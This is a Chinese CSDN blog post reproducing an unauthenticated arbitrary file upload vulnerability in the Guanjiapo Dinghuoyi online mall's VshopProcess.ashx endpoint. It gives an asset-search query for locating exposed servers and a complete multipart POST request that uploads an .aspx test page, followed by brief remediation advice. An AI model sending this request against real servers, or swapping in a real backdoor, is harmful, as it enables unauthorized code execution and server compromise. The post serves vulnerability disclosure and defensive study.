【漏洞复现】管家婆订货易在线商城-VshopProcess.ashx-任意文件上传漏洞

已于 2024-03-19 13:01:01 修改
阅读量468 收藏 10
点赞数 6
分类专栏: 漏洞复现 文章标签: 网络安全
于 2024-03-15 20:42:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/136749443
版权
本文报道了管家婆订货易在线商城中的VshopProcess.ashx接口存在未认证任意文件上传漏洞,攻击者可上传恶意文件导致代码执行和服务器失陷。文章提供了漏洞复现方法并给出了修复建议,强调了安全过滤和访问控制的重要性。
摘要由CSDN通过智能技术生成

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件,深入利用可造成代码执行和服务器失陷。

影响范围

管家婆订货易在线商城

资产测绘

title="订货易"||title="管家婆分销ERP" || body="管家婆分销ERP" || body="ERP V3"

image

漏洞复现

POST /API/VshopProcess.ashx?action=PostFileImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/57.0.578.100 Safari/537.36
Accept-Encoding: gzip
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytCOFhbEjc3IfYaY5

------WebKitFormBoundarytCOFhbEjc3IfYaY5
Content-Disposition: form-data; name="fileup1i"; filename="ceshi.aspx"
Content-Type: image/jpeg

<%@ Page Language="C#" %>
<% 
Response.Write("Hello World!");
System.IO.File.Delete(Request.ServerVariables["PATH_TRANSLATED"]);
%>

------WebKitFormBoundarytCOFhbEjc3IfYaY5--

image
请添加图片描述

修复建议

  • 对下载路径进行过滤,如下载前对传入的参数进行过滤,并且对下载文件类型进行检查,是否是允许下载的类型。
  • 通过防火墙等安全设备做访问控制策略或者白名单访问。
Nday_Seeker
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现管家婆 订货在线商城 VshopProcess 任意文件上传漏洞
qq_67810151的博客
03-05 465
管家婆订货在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件,深入利用可造成代码执行和服务器失陷。
用友时空KSOA ImageUpload任意文件上传漏洞复现+利用
0xSec
04-04 2236
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
ShopXO商城系统文件上传0Day代审历程
weixin_43526443的博客
09-05 2152
这两天攻防中,某政局内网横向发现多网段服务器,该服务器搭建了ShopXO商城系统(后来发现是开发临时搭建的,准备做二开用的)。结果花了30来秒审了个垃圾Day拿下该服务器,本文就是给新手提供思路(没交cnvd,懒)
ashx文件 验证是否登录_Web文件上传漏洞小结
weixin_39562197的博客
11-22 579
在现代互联网的Web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,然而向用户提供的功能越多,Web应用受到攻击的风险就越大,如果Web应用存在上传文件漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获得网站权限。文件上传漏洞介绍在一般情况下,文件上传漏洞一般都是指“上传Web脚本能够被服务器解析”的问题。要完成这个攻击,需要满足如下几个条件:上传...
漏洞复现】大华智慧园区前台任意文件上传
2201_75756681的博客
01-03 1322
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。二、 漏洞概述大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
漏洞复现管家婆订货在线商城-VshopProcess-任意文件上传
知黑而守白
03-05 370
管家婆订货,集合PC商城+微信商城+微信小程序+APP商城+h5商城四网合一网上订货商城系统,无缝对接管家婆软件,实现商品、库存、订单、客户、财务等数据无缝对接!管家婆订货系统 VshopProcess 接口存在一个任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
管家婆订货在线商城 VshopProcess 任意文件上传漏洞复现
0xSec
03-04 854
管家婆订货在线商城VshopProcess.aspx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件,深入利用可造成代码执行和服务器失陷。
漏洞复现订货管家婆在线商城 VshopProcess 任意文件上传漏洞
失心少年
03-09 155
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!管家婆订货,是一个帮助传统企业构建专属的订货平台的系统,包括PC+微信+APP+小程序+h5商城5网合一。管家婆订货在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,未授权的攻击者可以利用此漏洞上传恶意文件最终导致服务器被远控。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8369
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AuthBWC-0.3.3-py3-none-any.whl.zip
08-07
AuthBWC-0.3.3-py3-none-any.whl.zip
音视频剪辑库moviepy及其应用
最新发布
08-07
一些用moviepy库处理编辑视频的代码。主要包括:视频与视频之间的格式转换、视频提取音频、文本/颜色/遮罩剪辑、混剪、文字/转场切换特效及其与matplotlib、numpy创建动画的一些简单例子。
springboot510人职匹配推荐系统.zip
08-07
随着科学技术的飞速发展,各行各业都在努力与现代先进技术接轨,通过科技手段提高自身的优势;对于人职匹配推荐系统当然也不能排除在外,随着网络技术的不断成熟,带动了人职匹配推荐系统,它彻底改变了过去传统的管理方式,不仅使服务管理难度变低了,还提升了管理的灵活性。这种个性化的平台特别注重交互协调与管理的相互配合,激发了管理人员的创造性与主动性,对人职匹配推荐系统而言非常有利。 本系统采用的数据库是Mysql,使用SpringBoot框架开发,运行环境使用Tomcat服务器,ECLIPSE 是本系统的开发平台。在设计过程中,充分保证了系统代码的良好可读性、实用性、扩展性、通用性、便于后期维护、操作方便以及页面简洁等特点。
mtk芯片刷写改串软件10.1952.0.03.zip
08-07
ModemMeta 仅支持在联发科芯片组上运行的设备,无论是智能手机还是平板电脑。它不适用于联发科以外的芯片组设备。 Redmi NOTE 10 PRO 修复IMEI ENG ROM解决方案 1-通过SP_Flash_Tool_v5.2208_Win工具选择 格式化并下载 固件 2-关闭手机 3-用软件重启到 META mode 4-打开ModemMeta 5-连接手机并插入USB电缆 6-按加载DB选择固件附带的BP文件,然后选择IMEI下载并写入IMEI MEID 完成。 更多信息:https://blog.csdn.net/FL1768317420/article/details/140994208
adb常用命令合集脚本
08-07
adb常用命令合集脚本
C# 基础语法教程,简明实用
08-07
C# 基础语法教程,简明实用。
电子图书资源服务系统是一款基于 Java Swing 的 C-S 应用
08-07
电子图书资源服务系统是一款基于 Java Swing 的 C-S 应用,旨在提供电子图书资源一站式服务,可从系统提供的图书资源中直接检索资源并进行下载。.zip优质项目,资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目。 本人系统开发经验充足,有任何使用问题欢迎随时与我联系,我会及时为你解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(若有),项目具体内容可查看下方的资源详情。 【附带帮助】: 若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步。 【本人专注计算机领域】: 有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为你提供帮助,CSDN博客端可私信,为你解惑,欢迎交流。 【适合场景】: 相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可以基于此项目进行扩展来开发出更多功能 【无积分此资源可联系获取】 # 注意 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担。 2. 部分字体以及插图等来自网络,若是侵权请联系删除。积分/付费仅作为资源整理辛苦费用。
情人节主题网站开发基础教程.md
08-07
情人节,一个充满爱意与浪漫的节日,是表达情感、分享甜蜜的绝佳时机。本教程将引导您从零开始,开发一个以情人节为主题的网站,让您能够在这个特别的日子里,为情侣们提供一个展示他们爱情故事的平台。
fhsalghslhglsagag
08-07
fhsalghslhglsagag
/web.config.i18n.ashx?l=en-US&v=853828152
07-28
您好!对于您提到的 `/web.config.i18n.ashx?l=en-US&v=853828152`,这看起来像是一个 URL 地址。根据您提供的信息,它可能是用于国际化(i18n)的配置文件。`l=en-US` 表示语言为美式英语,`v=853828152` 则可能是版本号或者其他标识符。如果您有任何关于该 URL 的具体问题或者需要更多的背景信息,请告诉我!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值